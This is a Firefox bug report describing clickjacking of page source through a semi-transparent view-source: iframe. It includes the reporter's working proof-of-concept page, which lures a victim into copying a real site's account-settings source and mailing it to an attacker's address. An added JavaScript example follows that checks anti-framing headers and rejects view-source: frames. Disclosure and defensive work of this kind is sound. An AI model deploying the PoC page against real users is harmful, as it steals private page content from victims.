Bug 953333
Opened 11 years ago
Closed 10 years ago
clickjacking source code
Categories
(Firefox :: Untriaged, defect)
RESOLVED
DUPLICATE
of bug 624883
People
(Reporter: akhilreni, Unassigned)
Description

User Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36

Steps to reproduce:

<html>
<body>
<style>
body { font-family: Arial; }
#container { position: relative; }
#container2 { position: relative; }
#iframe2 {
  width: 800px;
  height: 500px;
  position: relative;
  top: 0;
  left: 0;
  filter: alpha(opacity=50);
  opacity: 0.5;
}
</style>
<div id="container">
  <form action="mailto:evilhawk08@gmail.com" method="POST" enctype="multipart/form-data" name="EmailTestForm">
    copy paste here<br>
    <input type="text" name="VisitorName"><br><br>
    <input type="submit" value="Email This Form">
  </form>
</div>
<div id="container2">
  <h1>click down, press ctrl+A and then copy it in the mail form above to receive your code</h1>
  <iframe id="iframe2" src="view-source:https://sellfy.com/user/#/settings/account"></iframe>
</div>
</body>
</html>

Actual results:

Hey there, the source code of sites with missing X-Frame-Options headers can be clickjacked. For example, if a site has its X-Frame-Options header missing, then an attacker can send a link to the victim and lure the victim into copying the source code and sending it to the attacker. With this, important things can indeed be revealed.

<iframe id="iframe2" src="view-source:https://sellfy.com/user/#/settings/account">

Expected results:

In Chrome, even if a site is vulnerable to clickjacking, the source code cannot be clickjacked. I think this is a browser bug and should be fixed. Hope you fix it soon :) Happy Christmas.
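The report turns on two checks: whether the target page sends anything that forbids framing, and whether the browser will load a view-source: URL as a frame at all. The following is an added example written for this page, not code from the reporter or from Firefox. It evaluates X-Frame-Options and the CSP frame-ancestors directive for a given parent origin (frame-ancestors wins when both are present, as CSP Level 2 specifies; ALLOW-FROM and other unrecognised X-Frame-Options values are treated as absent, which is how current browsers handle them), and it refuses view-source: as a frame target, the kind of rule a browser-side fix needs. The header values, origins and the simplified source-expression matcher are constructed assumptions.

```javascript
// Added example (not from the bug report or from Firefox): decide whether a
// response may be framed by a given parent origin, from its X-Frame-Options
// and Content-Security-Policy headers, and reject view-source: frame targets.
// All sample headers and origins below are constructed for illustration.

function parseOrigin(origin) {
  const u = new URL(origin);
  const scheme = u.protocol.replace(":", "");
  const port = u.port || (scheme === "https" ? "443" : "80");
  return { scheme, host: u.hostname, port };
}

function sameOrigin(a, b) {
  return a.scheme === b.scheme && a.host === b.host && a.port === b.port;
}

// Match one frame-ancestors source expression against the parent origin.
// Simplified matcher (assumption): supports 'none', 'self', '*', "scheme:"
// and [scheme://]host[:port] with an optional leading "*." wildcard.
function sourceMatches(src, parent, self) {
  const s = src.replace(/^'|'$/g, "").toLowerCase();
  if (s === "none") return false;
  if (s === "*") return true;
  if (s === "self") return sameOrigin(parent, self);
  if (/^[a-z][a-z0-9+.-]*:$/.test(s)) return parent.scheme === s.slice(0, -1);
  const m = s.match(/^(?:([a-z][a-z0-9+.-]*):\/\/)?(\*\.)?([^:/*]+)(?::(\d+|\*))?$/);
  if (!m) return false;
  const [, scheme, wild, host, port] = m;
  if (scheme && scheme !== parent.scheme) return false;
  if (wild) {
    if (!parent.host.endsWith("." + host)) return false;
  } else if (parent.host !== host) {
    return false;
  }
  if (port && port !== "*" && port !== parent.port) return false;
  return true;
}

// headers: plain object of response header name -> value (case-insensitive).
function isFrameable(headers, parentOrigin, selfOrigin) {
  const parent = parseOrigin(parentOrigin);
  const self = parseOrigin(selfOrigin);
  const get = (name) => {
    const k = Object.keys(headers).find((h) => h.toLowerCase() === name);
    return k ? headers[k] : undefined;
  };

  // CSP frame-ancestors takes precedence over X-Frame-Options when present.
  const csp = get("content-security-policy");
  if (csp) {
    const directive = csp
      .split(";")
      .map((d) => d.trim())
      .find((d) => d.toLowerCase().startsWith("frame-ancestors"));
    if (directive) {
      const sources = directive.split(/\s+/).slice(1);
      return sources.some((src) => sourceMatches(src, parent, self));
    }
  }

  const xfo = get("x-frame-options");
  if (!xfo) return true; // no header at all: any origin may frame the page
  const v = xfo.trim().toUpperCase();
  if (v === "DENY") return false;
  if (v === "SAMEORIGIN") return sameOrigin(parent, self);
  return true; // ALLOW-FROM / unrecognised value: treated as absent
}

// A frame whose src uses the view-source: scheme would expose the page's
// source to the clickjacking trick in the report; refuse it outright.
function frameTargetAllowed(src) {
  return !/^\s*view-source:/i.test(src);
}

// Worked run over constructed headers for the page named in the report.
function demo() {
  const target = "https://sellfy.com";
  const attacker = "https://evil.example";
  return {
    noHeaders: isFrameable({}, attacker, target),
    sameOriginFromAttacker: isFrameable({ "X-Frame-Options": "SAMEORIGIN" }, attacker, target),
    sameOriginFromSelf: isFrameable({ "X-Frame-Options": "SAMEORIGIN" }, target, target),
    cspOverridesXfo: isFrameable(
      { "X-Frame-Options": "DENY", "Content-Security-Policy": "default-src 'self'; frame-ancestors 'self' https://*.partner.example" },
      "https://app.partner.example", target),
    viewSourceFrame: frameTargetAllowed("view-source:https://sellfy.com/user/#/settings/account"),
  };
}
```

With no anti-framing header at all, `isFrameable` returns true for the attacker origin, which is the condition the report relies on; the `frameTargetAllowed` check is the separate, browser-side rule that closes the view-source: variant even for pages that remain frameable.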
Comment 1•10 years ago
The view-source problem is known and is being discussed. Marking as a duplicate of bug 624883.
Status: UNCONFIRMED → RESOLVED
Closed: 10 years ago
Resolution: --- → DUPLICATE
Updated•9 years ago
Group: core-security → core-security-release
Updated•8 years ago
Group: core-security-release